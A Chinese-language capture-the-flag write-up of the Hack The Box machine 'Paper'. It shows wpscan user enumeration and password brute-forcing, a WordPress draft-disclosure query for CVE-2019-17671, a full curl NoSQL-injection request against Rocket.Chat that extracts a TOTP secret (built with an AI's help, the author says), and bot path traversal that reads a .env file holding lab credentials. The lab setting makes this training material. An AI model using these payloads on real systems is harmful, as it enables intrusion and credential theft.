进来一个ubuntu自带的欢迎页面，dirsearch扫一下拿拿信息

{"metricId":"6793b6fd-c521-4385-9ea0-b743487d53c1","metrics":{"from":"2021-07-01T07:01:26.689Z","to":"2021-07-01T07:29:18.286Z","successfulInstalls":6,"failedInstalls":0}}

学一点msf的使用

可惜到这里就卡住了，回HTB引导一下

提示What is the domain for the Wordpress blog? 但跟这个有什么关系

好吧，这里有一个htb独特的点，就是默认域名为paper.htb，根据这点再去做子域名扫描，其实在网络里也能看到

注意要用http进office.paper

/wp-admin尝试一下弱密码，进不去

发现官方的一个检测wordpress漏洞的工具wpscan

https://github.com/wpscanteam/wpscan

kali真好用啊，自带最新版本

wpscan --url http://office.paper

wpscan --url http://office.paper -e p
扫描插件，vp扫描插件漏洞，但需要官网申请token

有个主题，msf搜一下

先尝试登录吧，枚举用户名

wpscan --url http://derpnstink.local/weblog -e u

发现三个用户

prisonmike
nick
creedthoughts

wpscan --url http://office.paper -U prisonmike -P /home/gw/桌面/test/fuzzDicts-master/passwordDict/top500.txt

爆破密码

同时进来搜一下这几个用户名，发现一点提示

应该是要想办法看草稿

发现CVE-2019-17671正好对应版本5.2.3未授权访问

est

Micheal please remove the secret from drafts for gods sake!

Hello employees of Blunder Tiffin,

Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.

So, I kindly request you all to take your discussions from the public blog to a more private chat system.

-Nick

# Warning for Michael

Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick

Threat Level Midnight

A MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT

[INT:DAY]

Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….

# Secret Registration URL of new Employee chat system

http://chat.office.paper/register/8qozr226AhkCHZdyY

# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.

# Also, stop looking at my drafts. Jeez!

这里有一个比较坑爹的点，网上的payload都是asc，无法利用，换成dsc即可查看/?static=1&order=dsc

拿到新的网址

http://chat.office.paper/register/8qozr226AhkCHZdyY

这网页卡的批爆，看的我直发愣。靠刷新大法总算进来了

突然发现这玩意也能打CVE

把账号的双因子认证关闭，然后再找到管理员的邮箱即可

https://cloud.tencent.com/developer/article/1859035

丢给ai构造命令

curl -G 'http://chat.office.paper/api/v1/users.list' \
  --data-urlencode 'query={"$where":"this.username==='\''admin'\'' && (()=>{ throw this.services.totp.secret })()"}' \
  -H 'X-Auth-Token: iUj1AzQIi8o8xPsKp21Ck_A6XypHBkYzYLYlq8zxzj5' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Accept-Language: zh-CN' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36' \
  -H 'X-User-Id: ueBvmYywX7advzTJx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Referer: http://chat.office.paper/app/api/server/v1/users.js' \
  -H 'Cookie: rc_uid=ueBvmYywX7advzTJx; rc_token=iUj1AzQIi8o8xPsKp21Ck_A6XypHBkYzYLYlq8zxzj5'
{"users":[{"_id":"cehLnbjB9xv88JFD4","status":"offline","active":true,"name":"aaa","nameInsensitive":"aaa"},{"_id":"5iP6aLxNrs8E5S47Q","username":"DunMiffsys","status":"offline","active":true,"name":"DunMiff/sys","nameInsensitive":"dunmiff/sys"},{"_id":"SrtTqJwvCRmCNErxD","username":"DwightKSchrute","status":"offline","active":true,"name":"Dwight","avatarETag":"zBgJbDdyr4jyRMpTs","nameInsensitive":"dwight"},{"_id":"W2dajtnh4g9Eakc4d","username":"JIM9334","status":"offline","active":true,"name":"Jim","avatarETag":"DdBhzWmNF84rDipeX","nameInsensitive":"jim"},{"_id":"umhc2LunPqcMxpuhB","username":"Receptionitis15","status":"offline","active":true,"name":"Pam","avatarETag":"8PtGntTXt6HyFMwB3","nameInsensitive":"pam"},{"_id":"ueBvmYywX7advzTJx","status":"online","active":true,"name":"aaa","username":"aaa","nameInsensitive":"aaa"},{"_id":"vzADtHxN58iiaNY95","username":"actuallyoscar","status":"offline","active":true,"name":"Oscar","avatarETag":"eNbvD2htfoiRER4Xc","nameInsensitive":"oscar"},{"_id":"3pACoij7SH35924pr","username":"catlover","status":"offline","active":true,"name":"Angela","avatarETag":"4hEQXscy32FsLJSR7","nameInsensitive":"angela"},{"_id":"w4LmaNZWjyBtDgjpp","username":"creedthoughts","status":"offline","active":true,"name":"Creed","avatarETag":"DduKqSqtQW8eq8fdN","nameInsensitive":"creed"},{"_id":"d22WtYvu9SDvMcTLC","username":"dwightschrute","status":"offline","active":true,"name":"Dwight Schrute","avatarETag":"rAMJJeSFDGziAatoo","nameInsensitive":"dwight schrute"},{"_id":"Q74BkesCHPaRKYjak","username":"hrtoby","status":"offline","active":true,"name":"Toby","avatarETag":"CqFFEbHsDwMQnh4Xz","nameInsensitive":"toby"},{"_id":"MdJX6Kdc3STveZu4Y","username":"kellylikescupcakes","status":"offline","active":true,"name":"Kelly","avatarETag":"nyPiX8DDFzg6ZtgjR","nameInsensitive":"kelly"},{"_id":"DPq2mKNh9m5wENM2p","username":"meredithpalmer","status":"offline","active":true,"name":"Meredith","avatarETag":"49pxS3jA7S24KfsG3","nameInsensitive":"meredith"},{"_id":"NQ2JvGXL8gr7msi7o","username":"nick","status":"offline","active":true,"name":"nick","avatarETag":"cNdxrAfP7Pr5WCirT","nameInsensitive":"nick"},{"_id":"PvSX4dgWzQhnmNujT","status":"offline","active":true,"name":"pb","username":"pb","nameInsensitive":"pb"},{"_id":"aLFDk9yzAhxp6JzrJ","username":"phyllisbobvancefromvancerefigeration","status":"offline","active":true,"name":"Phyllis Vance","avatarETag":"XKtDM4fSXZ3Xf2Ncg","nameInsensitive":"phyllis vance"},{"_id":"ps6gjvimJ3DxeZA86","status":"offline","active":true,"name":"Michael Scott","username":"prisonmike","avatarETag":"Lt5nBQ6hccJnrmjqg","nameInsensitive":"michael scott"},{"_id":"siKFfAEiy9JnJwfCk","username":"realastonkutcher","status":"offline","active":true,"name":"Kevin","avatarETag":"WiGi6HYTadKj5Zf9q","nameInsensitive":"kevin"},{"_id":"qzPLDHsqfYEcJTMJu","username":"realmeredithpalmer","status":"offline","active":true,"name":"Meredith Palmer","avatarETag":"tKenMzo44RFRdEPeM","nameInsensitive":"meredith palmer"},{"_id":"WoxmTzWbvoijWkN5X","username":"recyclops","status":"online","active":true,"name":"RecyclopsBot","avatarETag":"L9pEEpwebBTXPKgqJ","nameInsensitive":"recyclopsbot"},{"_id":"rocket.cat","name":"Rocket.Cat","username":"rocket.cat","status":"online","active":true,"avatarETag":null,"nameInsensitive":"rocket.cat"},{"_id":"BcPDYqH4boQNR3nbE","username":"stanhudson","status":"offline","active":true,"name":"Stanley Hudson","avatarETag":"8FkwWpY62pnZ2dQnm","nameInsensitive":"stanley hudson"},{"_id":"gtNuENR8pianEYMHt","username":"wuphfryan","status":"offline","active":true,"name":"Ryan","avatarETag":"R4XbB4zfGpJbppFC8","nameInsensitive":"ryan"}],"count":23,"offset":0,"total":23,"success":true}                                            

试了一下打不通，回来确认了一下，当前rocket的版本是3.16.3，没有什么好的cve能利用，这里回到聊天室，发现一个有特殊功能的bot

发现可以用../绕过导致list任意读文件

读取.env文件

<!=====Contents of file ../hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
<!=====End of file ../hubot/.env=====>

这个密码有什么用呢，它的创建者是dwight，当前也在这个目录下，能否用这个ssh登录